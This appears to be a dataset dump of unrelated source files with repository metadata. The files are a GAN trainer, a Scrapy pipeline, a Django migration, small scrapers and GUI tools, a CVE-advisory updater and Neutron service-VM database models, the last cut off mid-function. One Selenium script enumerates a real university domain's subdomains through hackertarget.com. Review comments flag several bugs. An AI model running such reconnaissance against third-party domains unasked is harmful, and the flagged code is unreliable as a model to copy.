        data = np.reshape(data, [-1, 28, 28, 1])
        # rescale pixels from [0, 1] to [-1, 1]
        data = data * 2.0 - 1.0
        could_load, checkpoint_counter = self.load(self.checkpoint_dir)
        if could_load:
            self.counter = checkpoint_counter
            print(" [*] Load SUCCESS")
        else:
            print(" [!] Load failed...")
        for epoch in xrange(config.epoch):
            batch_idxs = min(data_len, config.train_size) // config.batch_size
            for idx in xrange(0, batch_idxs):
                batch_images = data[idx * config.batch_size:(idx + 1) * config.batch_size, :]
                #######################################################
                # TODO: Train your model here. Sample hidden z from
                # standard uniform distribution. In each step, run g_optim
                # twice to make sure that d_loss does not go to zero.
                # print the loss terms at each training step to monitor
                # the training process. Print sample images every
                # config.print_step steps.You may use function
                # save_images in utils.py to save images.
                #######################################################
                # NOTE(review): the TODO above suggests running g_optim
                # twice per step, but it is only run once here.
                batch_z = np.random.uniform(-1, 1, [self.batch_size, self.z_dim]).astype(np.float32)
                _, d_loss = self.sess.run([d_optim, self.d_loss], feed_dict={self.x: batch_images, self.z: batch_z})
                _, g_loss = self.sess.run([g_optim, self.g_loss], feed_dict={self.x: batch_images, self.z: batch_z})
                if np.mod(self.counter, 10) == 1:
                    print("Epoch: [%2d] [%4d/%4d], d_loss: %.8f, g_loss: %.8f" % (epoch, idx, batch_idxs, d_loss,
                                                                                  g_loss))
                #######################################################
                #                   end of your code
                #######################################################
                self.counter += 1
                # checkpoint every 500 steps, sample images every 100 steps
                if np.mod(self.counter, 500) == 1:
                    self.save(config.checkpoint_dir, self.counter)
                if np.mod(self.counter, 100) == 0:
                    samples = self.sess.run(self.x_fake, feed_dict={self.z: self.sample_z})
                    save_images(samples, image_manifold_size(samples.shape[0]),
                                './{}/train_{:02d}_{:04d}.png'.format(config.sample_dir, epoch, idx + 1))
    @property
    def model_dir(self):
        """Checkpoint subdirectory name derived from dataset/batch/output size."""
        return "{}_{}_{}_{}".format(
            self.dataset_name, self.batch_size,
            self.output_size, self.output_size)
    def save(self, checkpoint_dir, step):
        """Save the current session under checkpoint_dir/<model_dir>."""
        model_name = "DCGAN.model"
        checkpoint_dir = os.path.join(checkpoint_dir, self.model_dir)
        if not os.path.exists(checkpoint_dir):
            os.makedirs(checkpoint_dir)
        self.saver.save(self.sess,
                        os.path.join(checkpoint_dir, model_name),
                        global_step=step)
    def load(self, checkpoint_dir):
        """Restore the latest checkpoint, if any.

        Returns (True, step) on success, (False, 0) otherwise."""
        import re
        print(" [*] Reading checkpoints...")
        checkpoint_dir = os.path.join(checkpoint_dir, self.model_dir)
        ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
        if ckpt and ckpt.model_checkpoint_path:
            ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
            self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
            # extract the trailing step number from the checkpoint file name
            self.counter = int(next(re.finditer("(\d+)(?!.*\d)", ckpt_name)).group(0))
            print(" [*] Success to read {}".format(ckpt_name))
            return True, self.counter
        else:
            print(" [*] Failed to find a checkpoint")
            return False, 0
| riemanli/UCLA_STATS_232A_Statistical_Modeling_and_Learning_in_Vision_and_Cognition | project4/gan/model_gan.py | model_gan.py | py | 11,459 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow.variable_scope",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "tensorflow.reshape",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "tensorflow.nn.sigmoid",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "te... |
29620255242 | # Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
import time
import codecs
import json
import os
class AiqichademoPipeline:
    """Write every scraped item as one JSON object per line into a
    date-stamped file, wrapped in a single JSON array."""
    def __init__(self):
        super().__init__()  # run the parent constructor
        today = time.strftime('%Y-%m-%d', time.localtime())
        self.fp = codecs.open('scraped_data'+today +
                              '.json', 'w', encoding='utf-8')
        # open the JSON array
        self.fp.write('[')
    def process_item(self, item, spider):
        # convert the item to a plain dict...
        d = dict(item)
        # ...then serialise it as JSON, keeping non-ASCII characters readable
        string = json.dumps(d, ensure_ascii=False)
        self.fp.write(string + ',\n')  # trailing comma + newline after each record
        return item
    def close_spider(self, spider):
        # NOTE(review): if no item was ever processed only '[' (1 byte) has
        # been written, so seeking 2 bytes back from the end will fail or
        # corrupt the file -- confirm the spider always yields an item.
        self.fp.seek(-2, os.SEEK_END)  # position just before the final ",\n"
        self.fp.truncate()  # drop the trailing comma and newline
        self.fp.write(']')  # close the JSON array
        self.fp.close()  # close the file
| hua345/myBlog | python/scrapy/aiqichaDemo/aiqichaDemo/pipelines.py | pipelines.py | py | 1,210 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.strftime",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "time.localtime",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "codecs.open",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_numbe... |
23411369560 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.utils.timezone import utc
class Migration(migrations.Migration):
    # Auto-generated by Django makemigrations; edit with care.
    dependencies = [
        ('clientes', '0002_auto_20150927_2202'),
    ]
    operations = [
        migrations.CreateModel(
            name='ReservaEstado',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('reserva_estado', models.CharField(max_length=1)),
                ('descripcion', models.CharField(max_length=50)),
            ],
        ),
        migrations.RenameField(
            model_name='reserva',
            old_name='reserva_descripcion',
            new_name='descripcion',
        ),
        migrations.RenameField(
            model_name='reserva',
            old_name='reserva_fecha_hora',
            new_name='fecha_hora',
        ),
        migrations.RemoveField(
            model_name='reserva',
            name='reserva_estado',
        ),
        migrations.AlterField(
            model_name='cliente',
            name='fecha_nacimiento',
            # NOTE: the default is a timestamp frozen at migration-creation time.
            field=models.DateField(default=datetime.datetime(2015, 9, 28, 5, 32, 10, 889000, tzinfo=utc)),
        ),
        migrations.AddField(
            model_name='reserva',
            name='estado',
            field=models.ForeignKey(default=b'V', to='clientes.ReservaEstado'),
        ),
    ]
| pmmrpy/SIGB | clientes/migrations_2/0003_auto_20150928_0132.py | 0003_auto_20150928_0132.py | py | 1,491 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.db.migrations.Migration",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "django.db.migrations",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.db.migrations.CreateModel",
"line_number": 16,
"usage_type": "call"
},
... |
6348823299 | # This is a sample Python script.
# Press Shift+F10 to execute it or replace it with your code.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.
# Press the green button in the gutter to run the script.
import requests
import bs4
def get_document(url):
    """Fetch *url* and return a parsed BeautifulSoup document, or None on a
    non-200 response."""
    response = requests.get(url)
    if response.status_code != 200:
        # keep the original failure message for parity with callers
        print("Getting code is failure")
        return None
    return bs4.BeautifulSoup(response.text, "html.parser")
def find_image_links(soup):
    """Return the href of every image anchor under a div.separator element.

    :param soup: parsed document exposing a CSS ``select`` method
    :return: list of href strings, in document order
    """
    # One comprehension replaces the original's two throwaway list()
    # initialisations and the manual append loop.
    return [anchor.get('href') for anchor in soup.select("div.separator > a")]
# Target blog post whose image links we want to extract.
url = "https://deblur99.blogspot.com/2021/07/uploading21-07-21.html"
soup = get_document(url)
# Output file receives one <img> tag per discovered link.
f = open("./link_list.txt", 'w')
if soup is not None:
    linkList = find_image_links(soup)
    # additional deletion (manually blank out unwanted entries by index)
    # linkList[6] = ""
    # linkList[24] = ""
    for link in linkList:
        if link != "":
            f.write(f'<img src=\"{link}\">\n')
f.close()
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
| deblur99/getURLsFromBlogger | main.py | main.py | py | 1,225 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 17,
"usage_type": "call"
}
] |
70387110823 | "Converter with PySimpleGUI"
import PySimpleGUI as sg
layout = [[sg.Input(key="-INPUT-", size=(40, 40)),
sg.Spin(["kilometer to meter", "meter to decimeter", "dosimeter to centimeter"], background_color="black", text_color="white", key="-SPIN-"),
sg.Button("convert", key="-CONVERT-", button_color="black")],
[sg.Text("output", key="-OUTPUT-", background_color="white", text_color="black")]]
window = sg.Window("converter", layout, background_color="white", size=(500, 100))
while True:
event, values = window.read()
if event == sg.WIN_CLOSED:
break
if event == "-CONVERT-":
input_number = values["-INPUT-"]
if input_number.isnumeric():
if values["-SPIN-"] == "kilometer to meter":
output = round(float(input_number) * 1000, 2)
output_str = f"{input_number} km is {output}m"
if values["-SPIN-"] == "meter to decimeter":
output = round(float(input_number) * 10, 2)
output_str = f"{input_number} m is {output}dm"
if values["-SPIN-"] == "dosimeter to centimeter":
output = round(float(input_number) * 10, 2)
output_str = f"{input_number} dm is {output}cm"
window["-OUTPUT-"].update(output_str)
else:
window["-OUTPUT-"].update("please enter a number!!!!!!!!!!!!!!!! not a text!")
window.close()
| HadisehMirzaei/converter-PySimpleGUI | main.py | main.py | py | 1,436 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "PySimpleGUI.Input",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "PySimpleGUI.Spin",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "PySimpleGUI.Button",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "PySimpleGUI.Text",... |
32181630269 | import sys
import markdown
import json
import os
import re
from bs4 import BeautifulSoup
# This is a WIP unused script to
# write data back to the GSD database
# CLI arguments: directory holding the wiki advisory pages, and the GSD repo root.
advisories_dir = sys.argv[1]
gsd_dir = sys.argv[2]
CVE_REGEX = r"CVE-\d{4}-\d{4,7}"
FILE_FORMAT = "/Security-Updates-{version}.md"
ADVISORY_URL = "https://github.com/vmware/photon/wiki/Security-Update-{slug}"
# Photon OS major versions 1-4 each have their own advisory page.
PHOTON_VERSIONS = range(1, 5)
def advisory_slug(os_version, advisory):
    """Build the wiki slug "<version>.0-<n>" from an advisory id such as
    "PHSA-2019-0042" (third dash-separated field, leading zeros dropped)."""
    numeric_id = int(advisory.split("-")[2])
    return "{}.0-{}".format(os_version, numeric_id)
def generate_cve_mapping():
    """Parse each Photon wiki advisory table and map CVE ids to lists of
    advisory slugs."""
    mapping = {}
    for version in PHOTON_VERSIONS:
        page_path = advisories_dir + FILE_FORMAT.format(version=version)
        with open(page_path, "r") as handle:
            # render the markdown table to HTML so BeautifulSoup can walk it
            table_html = markdown.markdown(
                handle.read(), extensions=["markdown.extensions.tables"]
            )
        soup = BeautifulSoup(table_html, "html.parser")
        for row in soup.find("tbody").find_all("tr"):
            # each row: advisory id, severity, date, packages, CVE list
            (advisory, severity, date, packages, cves) = [
                cell.text for cell in row.find_all("td")
            ]
            slug = advisory_slug(version, advisory)
            for cve in re.findall(CVE_REGEX, cves):
                mapping.setdefault(cve, []).append(slug)
    return mapping
def __main__():
    """Merge Photon advisory links into the matching GSD JSON records.

    For each CVE found in the advisory tables, locate the corresponding
    GSD-<year>-<id>.json file under gsd_dir and attach the advisory URLs.
    """
    mapping = generate_cve_mapping()
    for cve in mapping:
        (_, year, _id) = cve.split("-")
        grouping_id = _id[:-3] + "xxx"
        gsd = f"GSD-{year}-{_id}"
        path = f"{gsd_dir}/{year}/{grouping_id}/{gsd}.json"
        if not os.path.exists(path):
            print(f"Could not find {cve}")
            continue
        with open(path, "r") as f:
            data = json.loads(f.read())
        urls = [ADVISORY_URL.format(slug=slug) for slug in mapping[cve]]
        if 'gsd' in data:
            existing_links = [x['url'] for x in data['gsd']['references']]
            # BUG FIX: the original computed `existing_links - urls`, which
            # raises TypeError on lists, and then appended *every* url
            # (duplicating any already present).  Append only the links
            # that are genuinely missing.
            for url in urls:
                if url not in existing_links:
                    data['gsd']['references'].append({
                        "type": "ADVISORY",
                        "url": url
                    })
        elif 'GSD' in data and 'references' in data['GSD']:
            data['GSD']['references'].extend(urls)
        elif 'GSD' in data:
            data['GSD']['references'] = urls
        else:
            # No GSD block yet: pull a description from either CVE
            # namespace (cve.org preferred) and create one.
            try:
                description = data['namespaces']['cve.org']['description']['description_data'][0]['value']
            except KeyError:
                description = data['namespaces']['nvd.nist.gov']['cve']['description']['description_data'][0]['value']
            data['GSD'] = {
                "alias": cve,
                "description": description,
                "id": gsd,
                "references": urls
            }
        with open(path, 'w') as f:
            f.write(json.dumps(data, indent=4))
if __name__ == "__main__":
__main__()
| captn3m0/photon-os-advisories | update.py | update.py | py | 3,376 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "markdown.markdown",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
... |
18617757117 | # modules in standard library
import re
from urllib.parse import urlparse
import requests
from selenium import webdriver
from selenium.webdriver.common.keys import Keys #需要引入 keys 包
import time
class DnsRecord(object):
    def __init__(self, domain):
        """
        Store the target domain and prepare HTTP defaults.

        :param domain: the domain whose subdomains we want to enumerate
        """
        self.domain = domain
        self.session = requests.Session()
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.8',
            'Accept-Encoding': 'gzip',
        }

    def get_by_hackertarget(self):
        """
        Drive hackertarget.com's DNS host-record search through a Selenium
        browser and scrape subdomains of ``self.domain`` from the response.

        :return: list of unique subdomain strings (never the bare domain)
        """
        subdomains = []
        base_url = "https://hackertarget.com/find-dns-host-records/"
        driver = webdriver.Firefox()  # launch the browser
        try:
            driver.get(base_url)  # open the search page
            # locate the query box by name, type the domain, and submit
            driver.find_element_by_name("theinput").send_keys(self.domain)
            driver.find_element_by_name("theinput").send_keys(Keys.ENTER)
            time.sleep(3)  # crude wait for the results to render
            text = driver.find_element_by_id("formResponse").text  # domains and IPs
            # NOTE(review): self.domain is interpolated into the regex without
            # re.escape(), so dots in the domain match any character.
            link_regx = re.compile('(.*?)' + self.domain + '')  # match domain names
            links = link_regx.findall(text)
            try:
                for link in links:
                    if not link.startswith('http'):
                        link = "http://" + link + self.domain
                    subdomain = urlparse(link).netloc
                    if subdomain not in subdomains and subdomain != self.domain:
                        subdomains.append(subdomain.strip())
            except Exception:
                pass
            return subdomains
        finally:
            # BUG FIX: the original placed driver.quit() after `return`, so it
            # never executed and every call leaked a browser process.
            driver.quit()
def main(domain):
    """Entry point: enumerate subdomains of *domain*.

    :param domain: the target domain string
    :return: list of subdomains found via hackertarget
    """
    return DnsRecord(domain).get_by_hackertarget()
if __name__ == '__main__':
    # Try this module standalone; once subdomain collection works, commit it.
    print(main("hubu.edu.cn")) # print the subdomains of hubu.edu.cn
{
"api_name": "requests.Session",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.Firefox",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 33,
"usage_type": "name"
},
{
"api_name": "seleni... |
933336823 | import copy
import uuid
import sqlalchemy as sa
from sqlalchemy import orm
from sqlalchemy.orm import exc as orm_exc
from neutron.api.v2 import attributes
from neutron.common import core as sql
from neutron.common import constants as n_constants
from neutron.common import utils
from neutron import context as t_context
from neutron.db import api as qdbapi
from neutron.db import common_db_mixin
from neutron.db import model_base
from neutron.db import models_v2
from neutron.db import l3_db as l3
from neutron.extensions import servicevm
from neutron.extensions import l3 as l3_ext
from neutron import manager
from neutron.openstack.common import log as logging
from neutron.openstack.common import uuidutils
from neutron.openstack.common import timeutils
from neutron.plugins.common import constants
from neutron.plugins.openvswitch import ovs_db_v2
from neutron.services.vm.common import constants as s_constants
from neutron.services.vm.mgmt_drivers.rpc import svm_rpc_joint_agent_api
LOG = logging.getLogger(__name__)

# Status sets used to guard device state transitions below.
_ACTIVE_UPDATE = (constants.ACTIVE, constants.PENDING_UPDATE)
_ACTIVE = constants.ACTIVE
# States from which a delete is allowed to proceed.
_ACTIVE_UPDATE_ERROR_DEAD = (
    constants.PENDING_CREATE, constants.ACTIVE, constants.PENDING_UPDATE,
    constants.ERROR, constants.DEAD)
# Port device-owner aliases, re-exported from neutron common constants.
DEVICE_OWNER_ROUTER_INTF = n_constants.DEVICE_OWNER_ROUTER_INTF
DEVICE_OWNER_ROUTER_GW = n_constants.DEVICE_OWNER_ROUTER_GW
DEVICE_OWNER_FLOATINGIP = n_constants.DEVICE_OWNER_FLOATINGIP
EXTERNAL_GW_INFO = l3_ext.EXTERNAL_GW_INFO
# Nova extended server attribute carrying the compute host name.
INSTANCE_HOST_ATTR = 'OS-EXT-SRV-ATTR:host'
###########################################################################
# db tables
class DeviceTemplate(model_base.BASEV2, models_v2.HasId, models_v2.HasTenant):
    """Template from which hosting devices (service VMs) are created."""
    # Descriptive name
    name = sa.Column(sa.String(255))
    description = sa.Column(sa.String(255))
    # Service type(s) that this service VM provides.
    # At first phase this includes only a single service; in future a
    # single service VM may accommodate multiple services.
    service_types = orm.relationship('ServiceType', backref='template')
    # Driver used to create the hosting device, e.g. noop, nova, heat.
    infra_driver = sa.Column(sa.String(255))
    # Driver used to communicate with service management.
    mgmt_driver = sa.Column(sa.String(255))
    # Vendor driver for the device.
    device_driver = sa.Column(sa.String(255))
    # If shared is True, all tenants may use this template.
    shared = sa.Column(sa.Boolean(), nullable=False)
    created_at = sa.Column('created_at', sa.DateTime(), nullable=True)
    # (key, value) pairs needed to spin up the device.
    attributes = orm.relationship('DeviceTemplateAttribute',
                                  backref='template')
class ServiceType(model_base.BASEV2, models_v2.HasId):#, models_v2.HasTenant):
    """Service type which a hosting device provides.

    A device may provide many services, so this is a one-to-many
    relationship from DeviceTemplate.
    """
    # Owning template row.
    template_id = sa.Column(sa.String(36), sa.ForeignKey('devicetemplates.id'),
                            nullable=False)
    # NOTE: the ORM attribute is 'servicetype' (one word); callers must not
    # reference ServiceType.service_type.
    servicetype = sa.Column(sa.String(255), nullable=False)
class DeviceTemplateAttribute(model_base.BASEV2, models_v2.HasId):
    """(key, value) attribute needed to spin up a VM from a template.

    Key/value pairs keep the schema agnostic to the actual VM manager
    (nova, heat, ...), e.g. image-id, flavor-id for Nova. Interpretation
    is up to the infra driver of the hosting device.
    """
    template_id = sa.Column(sa.String(36), sa.ForeignKey('devicetemplates.id'),
                            nullable=False)
    key = sa.Column(sa.String(255), nullable=False)
    #value = sa.Column(sa.String(4096), nullable=True)
    # JSON-encoded value (stored via the project's JsonCom column type).
    value = sa.Column(sql.JsonCom(), nullable=False)
class Device(model_base.BASEV2, models_v2.HasTenant):
    """Hosting device that runs services.

    The term 'VM' is intentionally avoided because the host can be a VM
    or another kind of container.
    """
    id = sa.Column(sa.String(255),
                   primary_key=True,
                   default=uuidutils.generate_uuid)
    template_id = sa.Column(sa.String(36), sa.ForeignKey('devicetemplates.id'))
    template = orm.relationship('DeviceTemplate')
    name = sa.Column(sa.String(255), nullable=True)
    description = sa.Column(sa.String(255), nullable=True)
    # Sufficient information to uniquely identify the hosting device.
    # For a service VM this is the UUID of the nova instance.
    instance_id = sa.Column(sa.String(255), nullable=True)
    # Opaque management endpoint for talking to this hosting device,
    # e.g. (driver, mgmt_url) = (ssh, ip address).
    mgmt_url = sa.Column(sql.JsonCom(), nullable=True)
    # Device authentication info (JSON blob).
    auth = sa.Column(sql.JsonCom(), nullable=True)
    attributes = orm.relationship("DeviceAttribute", backref="device")
    # Bindings to the service instances hosted on this device.
    services = orm.relationship('ServiceDeviceBinding', backref='device')
    # Lifecycle status (PENDING_CREATE/ACTIVE/ERROR/DEAD/...).
    status = sa.Column(sa.String(255), nullable=False)
    created_at = sa.Column('created_at', sa.DateTime(), nullable=True)
    power_state = sa.Column('power_state', sa.String(36),
                            default=constants.DOWN, nullable=True)
class DeviceAttribute(model_base.BASEV2, models_v2.HasId):
    """(key, value) kwargs needed to spin up a concrete device instance.

    Key/value pairs keep the schema agnostic to the actual VM manager
    (nova, heat, ...). Interpretation is up to the infra driver.
    """
    device_id = sa.Column(sa.String(255), sa.ForeignKey('devices.id'),
                          nullable=False)
    key = sa.Column(sa.String(255), nullable=False)
    # JSON-encoded value, e.g.
    # "nic": [{"net-id": <net-uuid>}, {"port-id": <port-uuid>}]
    #value = sa.Column(sa.String(4096), nullable=True)
    value = sa.Column(sql.JsonCom(), nullable=True)
# this table corresponds to ServiceInstance of the original spec
class ServiceInstance(model_base.BASEV2, models_v2.HasId, models_v2.HasTenant):
    """Logical service instance.

    This table only records which logical service instances exist.
    Service-specific tables (e.g. for "Routers", "LBaaS", "FW") hold the
    actual parameters for each service type; the relevant table is
    implicitly determined by service_type_id.
    """
    name = sa.Column(sa.String(255), nullable=True)
    service_type_id = sa.Column(sa.String(36),
                                sa.ForeignKey('servicetypes.id'))
    service_type = orm.relationship('ServiceType')
    # Denormalized copy of ServiceType.servicetype for convenience.
    servicetype = sa.Column(sa.String(255), nullable=False)
    # Points to a row in the service-specific table, if any.
    service_table_id = sa.Column(sa.String(36), nullable=True)
    # True: this service is managed by the user, who may change its
    #       configuration directly.
    # False: this service is managed by another neutron service (e.g.
    #        lbaas); users must change configuration via that service's
    #        API, not via the servicevm API.
    managed_by_user = sa.Column(sa.Boolean(), default=False)
    # Mgmt driver used to talk to the logical service instance inside the
    # hosting device, e.g. noop, OpenStack MGMT, OpenStack notification,
    # netconf, snmp, ssh, etc.
    mgmt_driver = sa.Column(sa.String(255))
    # Opaque management endpoint; interpreted by mgmt_driver.
    mgmt_url = sa.Column(sql.JsonCom(), nullable=True)
    attributes = orm.relationship("ServiceInstanceAttribute",
                                  backref="serviceinstance")
    devices = orm.relationship('ServiceDeviceBinding')
    status = sa.Column(sa.String(255), nullable=False)
    created_at = sa.Column('created_at', sa.DateTime(), nullable=True)

    # TODO(yamahata): re-think the necessity of following columns
    # They are all commented out for minimalism for now.
    # They will be added when it is found really necessary.
    #
    # multi_tenant = sa.Column(sa.Boolean())
    # state = sa.Column(sa.Enum('UP', 'DOWN',
    #                           name='service_instance_state'))
    # For a logical service instance in hosting device to recieve
    # requests from management tools.
    # opaque string. mgmt_driver interprets it.
    # e.g. the name of the interface inside the VM + protocol
    # vm_mgmt_if = sa.Column(sa.String(255), default=None, nullable=True)
    # networks =
    # obj_store =
    # cost_factor =
class ServiceInstanceAttribute(model_base.BASEV2, models_v2.HasId):
    """(key, value) kwargs attached to a logical service instance.

    Key/value pairs keep the schema agnostic to the actual VM manager
    (nova, heat, ...). Interpretation is up to the mgmt/infra driver.
    """
    service_instance_id = sa.Column(sa.String(255),
                                    sa.ForeignKey('serviceinstances.id'),
                                    nullable=False)
    key = sa.Column(sa.String(255), nullable=False)
    # JSON-encoded value, e.g.
    # "nic": [{"net-id": <net-uuid>}, {"port-id": <port-uuid>}]
    #value = sa.Column(sa.String(4096), nullable=True)
    value = sa.Column(sql.JsonCom(), nullable=True)
class ServiceDeviceBinding(model_base.BASEV2):
    """Binding between a Device and a ServiceInstance.

    A device can accommodate multiple services, so this is a
    many-to-one association table (composite primary key).
    """
    service_instance_id = sa.Column(
        sa.String(36), sa.ForeignKey('serviceinstances.id'), primary_key=True)
    device_id = sa.Column(sa.String(36), sa.ForeignKey('devices.id'),
                          primary_key=True)
class DeviceAgentBinding(model_base.BASEV2):
    """Binding between a device and the ServiceVM agent that manages it."""
    device_id = sa.Column(sa.String(36),
                          sa.ForeignKey("devices.id", ondelete='CASCADE'),
                          primary_key=True)
    servicevm_agent_id = sa.Column(sa.String(36),
                                   sa.ForeignKey("agents.id", ondelete='CASCADE'),
                                   primary_key=True)
###########################################################################
class ServiceResourcePluginDb(servicevm.ServiceVMPluginBase,
common_db_mixin.CommonDbMixin):
@property
def _core_plugin(self):
return manager.NeutronManager.get_plugin()
@property
def l3_plugin(self):
try:
return self._l3_plugin
except AttributeError:
self._l3_plugin = manager.NeutronManager.get_service_plugins().get(
constants.L3_ROUTER_NAT)
return self._l3_plugin
def subnet_id_to_network_id(self, context, subnet_id):
subnet = self._core_plugin.get_subnet(context, subnet_id)
return subnet['network_id']
    def __init__(self):
        # Register all servicevm models with the DB layer before the
        # common mixin machinery initialises.
        qdbapi.register_models()
        super(ServiceResourcePluginDb, self).__init__()
    def _get_resource(self, context, model, id):
        """Fetch a row of *model* by id, translating a miss into the
        model-specific servicevm NotFound exception.

        NOTE(review): the branch chain is split into several if-statements;
        only the final if carries the fall-through re-raise. Behavior is
        preserved here byte-for-byte.
        """
        try:
            return self._get_by_id(context, model, id)
        except orm_exc.NoResultFound:
            if issubclass(model, DeviceTemplate):
                raise servicevm.DeviceTemplateNotFound(device_tempalte_id=id)
            elif issubclass(model, ServiceType):
                raise servicevm.ServiceTypeNotFound(service_type_id=id)
            elif issubclass(model, ServiceInstance):
                raise servicevm.ServiceInstanceNotFound(service_instance_id=id)
            elif issubclass(model, DeviceAgentBinding):
                # NOTE(review): agent bindings are reported as a missing
                # device — presumably intentional; confirm with callers.
                raise servicevm.DeviceNotFound(device_id=id)
            if issubclass(model, Device):
                raise servicevm.DeviceNotFound(device_id=id)
            if issubclass(model, ServiceInstanceAttribute):
                raise servicevm.ServiceInstanceAttributeNotFound(service_instance_id=id)
            else:
                # Unknown model: propagate the original NoResultFound.
                raise
def _make_attributes_dict(self, attributes_db):
return dict((attr.key, attr.value) for attr in attributes_db)
def _make_service_types_list(self, service_types):
return [{'id': service_type.id,
'service_type': service_type.servicetype}
for service_type in service_types]
def _make_template_dict(self, template, fields=None):
res = {
'attributes':
self._make_attributes_dict(template['attributes']),
'service_types':
self._make_service_types_list(template.service_types)
}
key_list = ('id', 'tenant_id', 'name', 'description',
'shared','infra_driver', 'mgmt_driver',
'device_driver', 'created_at')
res.update((key, template[key]) for key in key_list)
return self._fields(res, fields)
def _make_services_list(self, binding_db):
return [binding.service_instance_id for binding in binding_db]
def _make_dev_attrs_dict(self, dev_attrs_db):
return dict((arg.key, arg.value) for arg in dev_attrs_db)
def _make_device_dict(self, device_db, fields=None):
LOG.debug(_('device_db %s'), device_db)
LOG.debug(_('device_db attributes %s'), device_db.attributes)
res = {
'services':
self._make_services_list(getattr(device_db, 'services', [])),
'device_template':
self._make_template_dict(device_db.template),
'attributes':
self._make_dev_attrs_dict(device_db.attributes),
}
key_list = ('id', 'tenant_id', 'name', 'description', 'instance_id',
'template_id', 'status', 'mgmt_url', 'created_at',
'power_state', 'auth')
res.update((key, device_db[key]) for key in key_list)
return self._fields(res, fields)
def _make_service_type_dict(self, service_type_db, fields=None):
res = {}
key_list = ('id', 'servicetype', 'template_id')
res.update((key, service_type_db[key]) for key in key_list)
return self._fields(res, fields)
def _make_service_device_list(self, devices):
return [binding.device_id for binding in devices]
#def get_service_instance_attr(self, context, service_instance_id, fields=None):
# service_instance_attr__db = self._get_resource(context, ServiceInstanceAttribute,
# service_instance_id)
# return self._make_service_attr_dict(service_instance_attr__db)
def _make_service_instance_dict(self, instance_db, fields=None):
res = {
'attributes':
self._make_attributes_dict(instance_db['attributes']),
'devices':
self._make_service_device_list(instance_db.devices),
'service_type':
self._make_service_type_dict(instance_db.service_type)
}
key_list = ('id', 'tenant_id', 'name', 'service_type_id',
'service_table_id', 'mgmt_driver', 'mgmt_url',
'status', 'created_at')
res.update((key, instance_db[key]) for key in key_list)
return self._fields(res, fields)
@staticmethod
def _infra_driver_name(device_dict):
return device_dict['device_template']['infra_driver']
@staticmethod
def _mgmt_driver_name(device_dict):
return device_dict['device_template']['mgmt_driver']
@staticmethod
def _device_driver_name(device_dict):
return device_dict['device_template']['device_driver']
@staticmethod
def _instance_id(device_dict):
return device_dict['instance_id']
###########################################################################
# hosting device template
    def create_device_template(self, context, device_template):
        """Create a DeviceTemplate row with its attributes and service
        types in one transaction and return the serialized dict.

        Raises InfraDriverNotSpecified / MGMTDriverNotSpecified /
        SeviceTypesNotSpecified when the respective field is unset.
        """
        template = device_template['device_template']
        LOG.debug(_('template %s'), template)
        tenant_id = self._get_tenant_id_for_create(context, template)
        infra_driver = template.get('infra_driver')
        mgmt_driver = template.get('mgmt_driver')
        device_driver = template.get('device_driver')
        service_types = template.get('service_types')
        shared = template.get('shared')
        # Validate the mandatory driver/service-type fields up front.
        if (not attributes.is_attr_set(infra_driver)):
            LOG.debug(_('hosting device driver unspecified'))
            raise servicevm.InfraDriverNotSpecified()
        if (not attributes.is_attr_set(mgmt_driver)):
            LOG.debug(_('mgmt driver unspecified'))
            raise servicevm.MGMTDriverNotSpecified()
        if (not attributes.is_attr_set(service_types)):
            LOG.debug(_('service types unspecified'))
            raise servicevm.SeviceTypesNotSpecified()
        with context.session.begin(subtransactions=True):
            template_id = str(uuid.uuid4())
            template_db = DeviceTemplate(
                id=template_id,
                tenant_id=tenant_id,
                name=template.get('name'),
                description=template.get('description'),
                infra_driver=infra_driver,
                device_driver=device_driver,
                shared=shared,
                created_at=timeutils.utcnow(),
                mgmt_driver=mgmt_driver)
            # Fill in a generated name when the user supplied none.
            utils.make_default_name(template_db, s_constants.PRE_DEV_TEM)
            context.session.add(template_db)
            # One row per (key, value) attribute.
            for (key, value) in template.get('attributes', {}).items():
                attribute_db = DeviceTemplateAttribute(
                    id=str(uuid.uuid4()),
                    template_id=template_id,
                    key=key,
                    value=value)
                context.session.add(attribute_db)
            # One ServiceType row per declared service type.
